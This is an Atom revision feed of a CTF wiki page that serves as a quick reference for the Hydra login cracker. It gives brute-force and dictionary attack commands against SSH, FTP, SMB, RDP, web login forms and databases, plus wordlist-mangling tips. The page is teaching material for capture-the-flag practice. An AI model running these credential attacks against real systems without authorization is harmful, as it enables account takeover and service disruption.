<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
	<id>https://wiki.brunnerne.dk/index.php?action=history&amp;feed=atom&amp;title=Hydra</id>
	<title>Hydra - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://wiki.brunnerne.dk/index.php?action=history&amp;feed=atom&amp;title=Hydra"/>
	<link rel="alternate" type="text/html" href="https://wiki.brunnerne.dk/index.php?title=Hydra&amp;action=history"/>
	<updated>2026-07-01T04:19:50Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.43.1</generator>
	<entry>
		<id>https://wiki.brunnerne.dk/index.php?title=Hydra&amp;diff=66&amp;oldid=prev</id>
		<title>The.mikkel: Created page with &quot;&#039;&#039;&#039;Hydra&#039;&#039;&#039;, often referred to as &#039;&#039;&#039;thc-hydra&#039;&#039;&#039;, is a parallelized network logon cracker. It is an essential tool for any CTF player when faced with a login prompt on a network service. This page serves as a quick reference for common Hydra commands and syntax.  == Core Syntax == The basic structure of a Hydra command is: &lt;code&gt;hydra [options] [[//service] | [service://]]&lt;target&gt;[:&lt;port&gt;]&lt;/code&gt;  The most critical options define the credential lists: * &#039;&#039;&#039;&lt;code&gt;-l &lt;USE...&quot;</title>
		<link rel="alternate" type="text/html" href="https://wiki.brunnerne.dk/index.php?title=Hydra&amp;diff=66&amp;oldid=prev"/>
		<updated>2025-08-04T10:56:02Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;&amp;#039;&amp;#039;&amp;#039;Hydra&amp;#039;&amp;#039;&amp;#039;, often referred to as &amp;#039;&amp;#039;&amp;#039;thc-hydra&amp;#039;&amp;#039;&amp;#039;, is a parallelized network logon cracker. It is an essential tool for any CTF player when faced with a login prompt on a network service. This page serves as a quick reference for common Hydra commands and syntax.  == Core Syntax == The basic structure of a Hydra command is: &amp;lt;code&amp;gt;hydra [options] [[//service] | [service://]]&amp;lt;target&amp;gt;[:&amp;lt;port&amp;gt;]&amp;lt;/code&amp;gt;  The most critical options define the credential lists: * &amp;#039;&amp;#039;&amp;#039;&amp;lt;code&amp;gt;-l &amp;lt;USE...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;&amp;#039;&amp;#039;&amp;#039;Hydra&amp;#039;&amp;#039;&amp;#039;, often referred to as &amp;#039;&amp;#039;&amp;#039;thc-hydra&amp;#039;&amp;#039;&amp;#039;, is a parallelized network logon cracker. It is an essential tool for any CTF player when faced with a login prompt on a network service. This page serves as a quick reference for common Hydra commands and syntax.&lt;br /&gt;
&lt;br /&gt;
== Core Syntax ==&lt;br /&gt;
The basic structure of a Hydra command is:&lt;br /&gt;
&amp;lt;code&amp;gt;hydra [options] [[//service] | [service://]]&amp;lt;target&amp;gt;[:&amp;lt;port&amp;gt;]&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The most critical options define the credential lists:&lt;br /&gt;
* &amp;#039;&amp;#039;&amp;#039;&amp;lt;code&amp;gt;-l &amp;lt;USER&amp;gt;&amp;lt;/code&amp;gt;&amp;#039;&amp;#039;&amp;#039;: Specifies a single username.&lt;br /&gt;
* &amp;#039;&amp;#039;&amp;#039;&amp;lt;code&amp;gt;-L &amp;lt;FILE&amp;gt;&amp;lt;/code&amp;gt;&amp;#039;&amp;#039;&amp;#039;: Specifies a file containing a list of usernames.&lt;br /&gt;
* &amp;#039;&amp;#039;&amp;#039;&amp;lt;code&amp;gt;-p &amp;lt;PASS&amp;gt;&amp;lt;/code&amp;gt;&amp;#039;&amp;#039;&amp;#039;: Specifies a single password.&lt;br /&gt;
* &amp;#039;&amp;#039;&amp;#039;&amp;lt;code&amp;gt;-P &amp;lt;FILE&amp;gt;&amp;lt;/code&amp;gt;&amp;#039;&amp;#039;&amp;#039;: Specifies a file containing a list of passwords.&lt;br /&gt;
* &amp;#039;&amp;#039;&amp;#039;&amp;lt;code&amp;gt;-C &amp;lt;FILE&amp;gt;&amp;lt;/code&amp;gt;&amp;#039;&amp;#039;&amp;#039;: Colon-separated file format, e.g., &amp;quot;user:pass&amp;quot;. Useful if you have paired credentials to test against multiple hosts.&lt;br /&gt;
* &amp;#039;&amp;#039;&amp;#039;&amp;lt;code&amp;gt;-x &amp;lt;MIN:MAX:CHARSET&amp;gt;&amp;lt;/code&amp;gt;&amp;#039;&amp;#039;&amp;#039;: Brute-force generation. E.g. &amp;lt;code&amp;gt;-x 1:3:aA1&amp;lt;/code&amp;gt; to try all 1-3 character combinations of lowercase, uppercase, and numbers.&lt;br /&gt;
&lt;br /&gt;
== Attack Modes: Dictionary vs. Brute-Force ==&lt;br /&gt;
Hydra supports two main attack methodologies. Understanding the difference is key to using the tool effectively.&lt;br /&gt;
&lt;br /&gt;
=== Dictionary Attack (Most Common) ===&lt;br /&gt;
A dictionary attack uses a predefined list of potential passwords (a &amp;quot;wordlist&amp;quot; or &amp;quot;dictionary&amp;quot;). This is the most common and efficient way to use Hydra, as it focuses on likely passwords. The quality of your wordlist is the most important factor for success. All commands using the &amp;#039;&amp;#039;&amp;#039;&amp;lt;code&amp;gt;-P&amp;lt;/code&amp;gt;&amp;#039;&amp;#039;&amp;#039; or &amp;#039;&amp;#039;&amp;#039;&amp;lt;code&amp;gt;-C&amp;lt;/code&amp;gt;&amp;#039;&amp;#039;&amp;#039; flags are performing a dictionary attack.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
# This is a dictionary attack using the rockyou.txt wordlist.&lt;br /&gt;
hydra -l admin -P /usr/share/wordlists/rockyou.txt ftp://10.10.10.10&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Pure Brute-Force Attack ===&lt;br /&gt;
A pure brute-force attack systematically tries every possible combination of characters for a given length and character set. This is extremely slow and only practical for very short or simple passwords (e.g., 4-digit PINs). This mode is enabled with the &amp;#039;&amp;#039;&amp;#039;&amp;lt;code&amp;gt;-x&amp;lt;/code&amp;gt;&amp;#039;&amp;#039;&amp;#039; flag.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
# Tries to find a 4-digit numeric PIN for the user &amp;#039;root&amp;#039;&lt;br /&gt;
hydra -l root -x 4:4:%d ssh://10.10.10.10&lt;br /&gt;
&lt;br /&gt;
# Tries all 1 to 3 character lowercase passwords&lt;br /&gt;
hydra -l user -x 1:3:%a telnet://10.10.10.10&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
* &amp;#039;&amp;#039;&amp;#039;Note on Charsets:&amp;#039;&amp;#039;&amp;#039; &amp;lt;code&amp;gt;%d&amp;lt;/code&amp;gt; = digits, &amp;lt;code&amp;gt;%a&amp;lt;/code&amp;gt; = lowercase letters, &amp;lt;code&amp;gt;%A&amp;lt;/code&amp;gt; = uppercase letters.&lt;br /&gt;
&lt;br /&gt;
== Common Command Flags ==&lt;br /&gt;
These flags are used in almost all scenarios to control Hydra&amp;#039;s behavior.&lt;br /&gt;
* &amp;#039;&amp;#039;&amp;#039;&amp;lt;code&amp;gt;-t &amp;lt;TASKS&amp;gt;&amp;lt;/code&amp;gt;&amp;#039;&amp;#039;&amp;#039;: Number of parallel connections (threads). Default is 16. For CTFs, a higher number like &amp;lt;code&amp;gt;-t 64&amp;lt;/code&amp;gt; is common, but be careful not to DoS the service.&lt;br /&gt;
* &amp;#039;&amp;#039;&amp;#039;&amp;lt;code&amp;gt;-V&amp;lt;/code&amp;gt;&amp;#039;&amp;#039;&amp;#039;: Verbose mode. Shows every attempt.&lt;br /&gt;
* &amp;#039;&amp;#039;&amp;#039;&amp;lt;code&amp;gt;-d&amp;lt;/code&amp;gt;&amp;#039;&amp;#039;&amp;#039;: Debug mode. Even more verbose.&lt;br /&gt;
* &amp;#039;&amp;#039;&amp;#039;&amp;lt;code&amp;gt;-f&amp;lt;/code&amp;gt;&amp;#039;&amp;#039;&amp;#039; or &amp;#039;&amp;#039;&amp;#039;&amp;lt;code&amp;gt;-F&amp;lt;/code&amp;gt;&amp;#039;&amp;#039;&amp;#039;: Stop after finding the first valid credential pair. &amp;#039;&amp;#039;&amp;#039;Crucial for speed in CTFs.&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
* &amp;#039;&amp;#039;&amp;#039;&amp;lt;code&amp;gt;-o &amp;lt;FILE&amp;gt;&amp;lt;/code&amp;gt;&amp;#039;&amp;#039;&amp;#039;: Output found credentials to a file.&lt;br /&gt;
* &amp;#039;&amp;#039;&amp;#039;&amp;lt;code&amp;gt;-s &amp;lt;PORT&amp;gt;&amp;lt;/code&amp;gt;&amp;#039;&amp;#039;&amp;#039;: Specify a non-default port for the service.&lt;br /&gt;
* &amp;#039;&amp;#039;&amp;#039;&amp;lt;code&amp;gt;-w &amp;lt;TIME&amp;gt;&amp;lt;/code&amp;gt;&amp;#039;&amp;#039;&amp;#039;: Set a maximum time to wait for a response (in seconds).&lt;br /&gt;
&lt;br /&gt;
== Protocol-Specific Examples ==&lt;br /&gt;
Below are common commands for services frequently encountered in challenges. We&amp;#039;ll assume common wordlists like &amp;lt;code&amp;gt;/usr/share/wordlists/rockyou.txt&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
=== SSH (ssh) ===&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
# Single user, password list&lt;br /&gt;
hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://10.10.1.23&lt;br /&gt;
&lt;br /&gt;
# User list, single password&lt;br /&gt;
hydra -L users.txt -p &amp;#039;password123&amp;#039; 10.10.1.23 ssh&lt;br /&gt;
&lt;br /&gt;
# User list, password list, on a non-standard port&lt;br /&gt;
hydra -L users.txt -P passwords.txt -t 64 -f -s 2222 10.10.1.23 ssh&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== FTP (ftp) ===&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
# Check for anonymous login&lt;br /&gt;
hydra -l anonymous -p &amp;#039;&amp;#039; ftp://192.168.1.5&lt;br /&gt;
&lt;br /&gt;
# Brute-force with user and password lists&lt;br /&gt;
hydra -L users.txt -P pass.txt ftp://192.168.1.5 -t 32 -f&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Telnet (telnet) ===&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
# Brute-force a telnet service&lt;br /&gt;
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt 10.12.110.8 telnet&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SMB (smb) ===&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
# Brute-force Windows SMB shares&lt;br /&gt;
# Note: For SMB, the target is often specified with a /// prefix&lt;br /&gt;
hydra -L users.txt -P passwords.txt smb://10.10.14.2&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== RDP (rdp) ===&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
# Brute-force a Remote Desktop Protocol service&lt;br /&gt;
hydra -L usernames.list -P rockyou.txt rdp://10.20.30.40 -f&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== HTTP Basic Authentication ===&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
# Brute-force a directory protected by .htaccess&lt;br /&gt;
hydra -L users.txt -P pass.txt 192.168.5.15 http-get /admin&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== HTTP POST Form ===&lt;br /&gt;
This is one of the most common web challenges. You need to inspect the login form to find the parameters.&lt;br /&gt;
&lt;br /&gt;
# &amp;#039;&amp;#039;&amp;#039;Step 1:&amp;#039;&amp;#039;&amp;#039; Inspect the form. Go to the login page, open browser developer tools (F12), and look at the Network tab when you submit a failed login. Find the POST request and its Form Data.&lt;br /&gt;
# Let&amp;#039;s say you find:&lt;br /&gt;
# * Login page: &amp;lt;code&amp;gt;/login.php&amp;lt;/code&amp;gt;&lt;br /&gt;
# * Username field name: &amp;lt;code&amp;gt;uname&amp;lt;/code&amp;gt;&lt;br /&gt;
# * Password field name: &amp;lt;code&amp;gt;pword&amp;lt;/code&amp;gt;&lt;br /&gt;
# * Failure message on the page: &amp;lt;code&amp;gt;Invalid Credentials&amp;lt;/code&amp;gt; or &amp;lt;code&amp;gt;Login failed&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
# &amp;#039;&amp;#039;&amp;#039;Step 2:&amp;#039;&amp;#039;&amp;#039; Craft the Hydra command.&lt;br /&gt;
# The syntax is: &amp;lt;nowiki&amp;gt;http-post-form &amp;quot;&amp;lt;login_page&amp;gt;:&amp;lt;form_parameters&amp;gt;:&amp;lt;failure_message&amp;gt;&amp;quot;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
# Use &amp;lt;code&amp;gt;^USER^&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;^PASS^&amp;lt;/code&amp;gt; as placeholders.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
# Example command&lt;br /&gt;
hydra -L users.txt -P passwords.txt 10.10.10.10 http-post-form &amp;quot;/login.php:uname=^USER^&amp;amp;pword=^PASS^:F=Invalid Credentials&amp;quot; -V -f&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;#039;&amp;#039;&amp;#039;Pro Tip:&amp;#039;&amp;#039;&amp;#039; If the failure condition is a redirect (HTTP 302) or a success cookie, the syntax changes slightly.&lt;br /&gt;
** On success redirect to /dashboard.php: &amp;lt;code&amp;gt;S=Location: /dashboard.php&amp;lt;/code&amp;gt;&lt;br /&gt;
** On success set cookie &amp;quot;sessionID&amp;quot;: &amp;lt;code&amp;gt;S=sessionID&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Database Services ===&lt;br /&gt;
==== PostgreSQL (postgres) ====&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
# Brute-force PostgreSQL. Default user is often &amp;#039;postgres&amp;#039;.&lt;br /&gt;
hydra -l postgres -P passwords.txt 127.0.0.1 postgres&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== MySQL (mysql) ====&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
# Brute-force MySQL/MariaDB. Default user is often &amp;#039;root&amp;#039;.&lt;br /&gt;
hydra -l root -P passwords.txt 127.0.0.1 mysql&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== CTF Tips &amp;amp; Best Practices ==&lt;br /&gt;
* &amp;#039;&amp;#039;&amp;#039;Leveraging Password Hints (Rule-Based Attacks):&amp;#039;&amp;#039;&amp;#039; CTFs often provide hints (e.g., a pet&amp;#039;s name, a birth year, a company name). These are not passwords themselves, but &amp;quot;base words&amp;quot;. You can use tools like John the Ripper (JtR) or Hashcat to apply mutation rules (mangling) to these base words to generate a powerful, custom password list.&lt;br /&gt;
#:&amp;#039;&amp;#039;&amp;#039;Step 1:&amp;#039;&amp;#039;&amp;#039; Create a file (e.g., &amp;lt;code&amp;gt;hints.txt&amp;lt;/code&amp;gt;) with your base words, one per line.&lt;br /&gt;
#:&amp;#039;&amp;#039;&amp;#039;Step 2:&amp;#039;&amp;#039;&amp;#039; Use JtR&amp;#039;s &amp;lt;code&amp;gt;--stdout&amp;lt;/code&amp;gt; mode to generate variations and save them to a new file.&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
# This command takes your hint words and applies common password rules (like adding &amp;#039;123&amp;#039;, &amp;#039;!&amp;#039;, etc.)&lt;br /&gt;
john --wordlist=hints.txt --rules=All --stdout &amp;gt; mangled_list.txt&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
#:&amp;#039;&amp;#039;&amp;#039;Step 3:&amp;#039;&amp;#039;&amp;#039; Use this new, highly-targeted list with Hydra.&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
hydra -l someuser -P mangled_list.txt ssh://10.10.10.10&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;#039;&amp;#039;&amp;#039;Website Wordlists:&amp;#039;&amp;#039;&amp;#039; If the target is a company website, use a tool like &amp;#039;&amp;#039;&amp;#039;CeWL&amp;#039;&amp;#039;&amp;#039; to crawl the site and create a wordlist from its content. This can reveal project names, employee names, and other potential password components.&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
cewl http://ctf.target.corp -d 2 -w custom_words.txt&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;#039;&amp;#039;&amp;#039;Start with defaults:&amp;#039;&amp;#039;&amp;#039; Before launching a massive brute-force, always check for default credentials (e.g., &amp;lt;code&amp;gt;admin:admin&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;root:password&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;test:test&amp;lt;/code&amp;gt;) and anonymous/guest access.&lt;br /&gt;
&lt;br /&gt;
* &amp;#039;&amp;#039;&amp;#039;Use &amp;lt;code&amp;gt;-f&amp;lt;/code&amp;gt; / &amp;lt;code&amp;gt;-F&amp;lt;/code&amp;gt;:&amp;#039;&amp;#039;&amp;#039; In a CTF, you usually only need one set of valid credentials. Use this flag to stop Hydra as soon as it finds one to save valuable time.&lt;br /&gt;
&lt;br /&gt;
* &amp;#039;&amp;#039;&amp;#039;Task Management (&amp;lt;code&amp;gt;-t&amp;lt;/code&amp;gt;):&amp;#039;&amp;#039;&amp;#039; A high task count is faster but can also lock you out or crash a fragile service. If you get lots of errors, try lowering the task count. Start with &amp;lt;code&amp;gt;-t 16&amp;lt;/code&amp;gt; and increase if the service seems stable.&lt;br /&gt;
&lt;br /&gt;
== See Also ==&lt;br /&gt;
* [[https://github.com/vanhauser-thc/thc-hydra|Official THC-Hydra GitHub Repository]]&lt;br /&gt;
* [[https://www.kali.org/tools/john/|John the Ripper for Rule-Based Wordlist Generation]]&lt;/div&gt;</summary>
		<author><name>The.mikkel</name></author>
	</entry>
</feed>